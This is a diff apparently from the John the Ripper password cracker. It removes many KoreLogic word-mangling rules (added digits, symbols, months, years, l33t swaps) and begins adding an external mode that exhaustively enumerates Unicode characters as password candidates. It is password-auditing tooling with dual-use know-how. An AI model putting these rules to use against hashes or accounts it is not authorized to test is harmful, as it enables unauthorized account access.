-## Add Number Number Special
-;-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-;-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-# Add 100! ... 999! to the end
-;-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials]
-[c:] <* \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAddShortMonthsEverywhere]
-<* >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
-<* >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
-<* >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
-<* >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
-<* >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
-<* >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
-<* >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
-<* >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
-<* >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
-<* >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
-
-# this will add the string '2010' at all places in the word:
-# USE this with a 4 or 5 char dictionary file with ALL characters
-# soo abcde will become
-# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
-;[List.Rules:KoreLogicRulesAdd2010Everywhere]
-<* >\r[00123456789] A\p[z0-9]"201[0-9]"
-
-;[List.Rules:KoreLogicRulesAdd1234_Everywhere]
-<* >\r[00123456789] A\p[z0-9]"1234"
-
-;[List.Rules:KoreLogicRulesAppendMonthDay]
-[:c] <* Az"\p[jJ]anuary"
-[:c] Az"\p[jJ]anuary[0-9]" <+
-[:c] Az"\p[jJ]anuary[0-9][0-9]" <+
-[:c] <* Az"\p[fF]ebruary"
-[:c] Az"\p[fF]ebruary[0-9]" <+
-[:c] Az"\p[fF]ebruary[0-9][0-9]" <+
-[:c] Az"\p[mM]arch"
-[:c] Az"\p[mM]arch[0-9]" <+
-[:c] Az"\p[mM]arch[0-9][0-9]" <+
-[:c] <* Az"\p[aA]pril"
-[:c] Az"\p[aA]pril[0-9]" <+
-[:c] Az"\p[aA]pril[0-9][0-9]" <+
-[:c] <* Az"\p[mM]ay"
-[:c] Az"\p[mM]ay[0-9]" <+
-[:c] Az"\p[mM]ay[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]une"
-[:c] Az"\p[jJ]une[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[jJ]une[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]uly"
-[:c] Az"\p[jJ]uly[0-9]" <+
-[:c] Az"\p[jJ]uly[0-9][0-9]" <+
-[:c] <* Az"\p[aA]ugust"
-[:c] Az"\p[aA]ugust[0-9]" <+
-[:c] Az"\p[aA]ugust[0-9][0-9]" <+
-[:c] <* Az"\p[sS]eptember"
-[:c] Az"\p[sS]eptember[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[sS]eptember[0-9][0-9]" <+
-[:c] <* Az"\p[oO]ctober"
-[:c] Az"\p[oO]ctober[0-9]" <+
-[:c] Az"\p[oO]ctober[0-9][0-9]" <+
-[:c] <* Az"\p[nN]ovember"
-[:c] Az"\p[nN]ovember[0-9]" <+
-[:c] Az"\p[nN]ovember[0-9][0-9]" <+
-[:c] <* Az"\p[dD]ecember"
-[:c] Az"\p[dD]ecember[0-9]" <+
-[:c] Az"\p[dD]ecember[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendMonthCurrentYear]
-[:c] <* Az"\p[jJ]an201[0-9]"
-[:c] <* Az"\p[fF]eb201[0-9]"
-[:c] <* Az"\p[mM]ar201[0-9]"
-[:c] <* Az"\p[aA]pr201[0-9]"
-[:c] <* Az"\p[mM]ay201[0-9]"
-[:c] <* Az"\p[jJ]un201[0-9]"
-[:c] <* Az"\p[jJ]ul201[0-9]"
-[:c] <* Az"\p[Aa]ug201[0-9]"
-[:c] <* Az"\p[sS]ep201[0-9]"
-[:c] <* Az"\p[oO]ct201[0-9]"
-[:c] <* Az"\p[nN]ov201[0-9]"
-[:c] <* Az"\p[Dd]ec201[0-9]"
-
-;[List.Rules:KoreLogicRulesReplaceNumbers2Special]
-/[1-90] s\0\p[!@#$%^&*()]
-/1 /[2-90] s1! s\0\p[@#$%^&*()]
-/2 /[3-90] s2@ s\0\p[#$%^&*()]
-/3 /[4-90] s3# s\0\p[$%^&*()]
-/4 /[5-90] s4$ s\0\p[%^&*()]
-/5 /[6-90] s5% s\0\p[^&*()]
-/6 /[7-90] s6^ s\0\p[&*()]
-/7 /[890] s7& s\0\p[*()]
-/8 /[90] s8* s\0\p[()]
-/9 /0 s9( s0)
-
-;[List.Rules:KoreLogicRulesReplaceNumbers]
-/0 s0[1-9]
-/1 s1[02-9]
-/2 s2[013-9]
-/3 s3[0-24-9]
-/4 s4[0-35-9]
-/5 s5[0-46-9]
-/6 s6[0-57-9]
-/7 s7[0-68-9]
-/8 s8[0-79]
-/9 s9[0-8]
-# 10 lines above can be replaced with just one:
-# /[0-9] s\0[0-9] Q
-# but it's slower (generates, then rejects some duplicates).
-
-# This is a lamer/faster version of --rules:nt
-;[List.Rules:KoreLogicRulesReplaceLettersCaps]
-c /[a-z] s\0\p[A-Z]
-
-;[List.Rules:KoreLogicRulesAddDotCom]
-[c:] <- \p[c:] Az".com"
-[c:] <- \p[c:] Az".net"
-[c:] <- \p[c:] Az".org"
-
-;[List.Rules:KoreLogicRulesPrependJustSpecials]
-[c:] \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend1_AddSpecialEverywhere]
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-
-;[List.Rules:KoreLogicRulesAppendNum_AddSpecialEverywhere]
-# This should probably use $[02-9] since we try $1 in
-# KoreLogicRulesAppend1_AddSpecialEverywhere
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-
-;[List.Rules:KoreLogicRulesAppendNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendYears_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-
-# This rule needs work actually --- you have to 'sort -u' its output    rick
-# /a = reject if it doesnt have an 'a'
-# the [:c] does waste some effort - and generate dupes. This is wasteful,
-# but I want to keep it in b/c the original crack/JtR rules use it.
-;[List.Rules:KoreLogicRulesL33t]
-[:c] /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
-# The following line differs from Kore's erroneous 4 lines:
-[:c] /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
-#/Lsl1[:c]
-#/Lsl7[:c]
-#/Lsl|[:c]
-#/Lsl![:c]
-[:c] /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Full set (same as above, but on one line):
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Double substitutions start here.
-# Compared to Kore's, we check for both chars first, then replace both.
-# This produces different results from Kore's, which would replace all
-# instances of the first char before checking for the second.
-# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
-# on the line below, and ditto for further lines.
-[:c] /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore had these (probably unintentionally, so we don't duplicate them):
-#/asa4/4s4a[:c]
-#/asa4/4s4A[:c]
-[:c] /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
-#/AsA4/4s4a[:c]
-#/AsA4/4s4A[:c]
-[:c] /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore's rules only included sl[17|], but not sl!
-[:c] /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# All "/L" rules (171 lines) were buggy
-[:c] /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
-# These are some popular triple/quad l33t rules
-[:c] /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /[el] /o /s sa4 s\0\p[31] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /l /o /s se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /a /e /l /o /s sa4 se3 sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-
-;[List.Rules:KoreLogicRulesReplaceSpecial2Special]
-# Kore's rules were missing "*"
-/! s![@#$%^&*()\-=_+\\|;:'",./?><]
-/@ s@[!#$%^&*()\-=_+\\|;:'",./?><]
-/# s#[!@$%^&*()\-=_+\\|;:'",./?><]
-/$ s$[!@#%^&*()\-=_+\\|;:'",./?><]
-/% s%[!@#$^&*()\-=_+\\|;:'",./?><]
-/^ s^[!@#$%&*()\-=_+\\|;:'",./?><]
-/& s&[!@#$%^*()\-=_+\\|;:'",./?><]
-/( s([!@#$%^&*)\-=_+\\|;:'",./?><]
-/) s([!@#$%^&*(\-=_+\\|;:'",./?><]
-# Kore's ruleset erroneously had:
-#/-s--
-/- s-[!@#$%^&*()=_+\\|;:'",./?><]
-/= s=[!@#$%^&*()\-_+\\|;:'",./?><]
-/_ s_[!@#$%^&*()\-=+\\|;:'",./?><]
-/+ s+[!@#$%^&*()\-=_\\|;:'",./?><]
-# Kore's rules did not replace backslash
-/\\ s\\[!@#$%^&*()\-=_+|;:'",./?><]
-/| s|[!@#$%^&*()\-=_+\\;:'",./?><]
-/; s;[!@#$%^&*()\-=_+\\|:'",./?><]
-/: s:[!@#$%^&*()\-=_+\\|;'",./?><]
-/' s'[!@#$%^&*()\-=_+\\|;:",./?><]
-/" s"[!@#$%^&*()\-=_+\\|;:',./?><]
-/, s,[!@#$%^&*()\-=_+\\|;:'"./?><]
-/. s.[!@#$%^&*()\-=_+\\|;:'",/?><]
-// s/[!@#$%^&*()\-=_+\\|;:'",.?><]
-/> s>[!@#$%^&*()\-=_+\\|;:'",./?<]
-/< s<[!@#$%^&*()\-=_+\\|;:'",./?>]
-
-;[List.Rules:KoreLogicRulesReplaceLetters]
-/a sa[b-z]
-/b sb[ac-z]
-/c sc[abd-z]
-/d sd[a-ce-z]
-/e se[a-df-z]
-/f sf[a-eg-z]
-/g sg[a-fh-z]
-/h sh[a-gi-z]
-/i si[a-hj-z]
-/j sj[a-ik-z]
-/k sk[a-jl-z]
-/l sl[a-km-z]
-/m sm[a-ln-z]
-/n sn[a-mo-z]
-/o so[a-np-z]
-/p sp[a-oq-z]
-/q sq[a-pr-z]
-/r sr[a-qs-z]
-/s ss[a-rt-z]
-/t st[a-su-z]
-/u su[a-tv-z]
-/v sv[a-uw-z]
-/w sw[a-vx-z]
-/x sx[a-wyz]
-/y sy[a-xz]
-# Kore's ruleset was truncated after "/zszr"
-/z sz[a-y]
-c /[a-z] s\0[A-Z]
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesPrependNumNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9][!$@#%.]"
-[c:] \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependDaysWeek]
-A0"[Mm][oO0][nN][dD][aA4@][yY]"
-A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
-A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
-A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
-A0"[Ff][rR][iI1!][dD][aA4@][yY]"
-A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
-A0"[Ss][uU][nN][dD][aA4@][yY]"
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-3]
-## Add Number Number Special
-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <* $[0-9]
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <* $[0-9]
-
-;[List.Rules:KoreLogicRulesAppend4Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrepend2NumbersAppend2Numbers]
-[c:] \p[c:] A0"[0-9][0-9]" <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependCAPCAPAppendSpecial]
-A0"[A-Z][A-Z]" <* $[!$@#%.]
-A0"[A-Z][A-Z]" <* $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-;[List.Rules:KoreLogicRulesAppendSpecialLowerLower]
-[c:] \p[c:] AzQ[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][a-z][a-z]Q <+
-
-# The last line of KoreLogicRulesAppendNumbers_and_Specials_Simple
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple-4]
-# Add 100! ... 999! to the end
-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial3num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppendSpecialNumberNumberNumber]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesAppend3NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependNumNum_AppendNumSpecial]
-[c:] \p[c:] A0"[0-9][0-9]" Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials3Times]
-[c:] \p[c:] Az"[!$@#%.][!$@#%.][!$@#%.]" <+
-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendCap-Num_or_Special-Twice]
-[c:] \p[c:] Az"[A-Z][0-9][0-9]" <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q <+
-[c:] \p[c:] Azq[A-Z][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-[c:] \p[c:] Azq[A-Z][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" <- Az"[0-9][0-9]"
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <- Az"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesAppend5Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendSpecial4num]
-[c:] \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]" <+
-[c:] \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q <+
-
-;[List.Rules:KoreLogicRulesPrepend4NumAppendSpecial]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- $[!$@#%.]
-[c:] \p[c:] A0"[0-9][0-9][0-9][0-9]" <- Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend4NumSpecial]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]" <+
-[c:] \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecialAppendNumbersNumberNumber]
-[c:] \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]" <+
-[c:] \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppend6Num]
-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]" <+
@@ -0,0 +1,1395 @@
+# This  software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Generic implementation of "dumb" exhaustive search of Unicode BMP.
+# Default is to try *all* allocated characters in the BMP of Unicode v11
+# (there's 55,292 of them). Even if a fast format can exhaust two characters
+# in 15 minutes, three characters would take 1.5 years...
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Dumb16]
+int maxlength;            // Maximum password length to try
+int last;                 // Last character position, zero-based
+int lastid;               // Character index in the last position
+int id[0x7f];             // Current character indices for other positions
+int charset[0x10000], c0; // Characters
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = 2;
+
+	# UTF-8 representation is up to 3x the character length
+	if (maxlength * 3 > cipher_limit)
+		maxlength = (cipher_limit + 2) / 3;
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
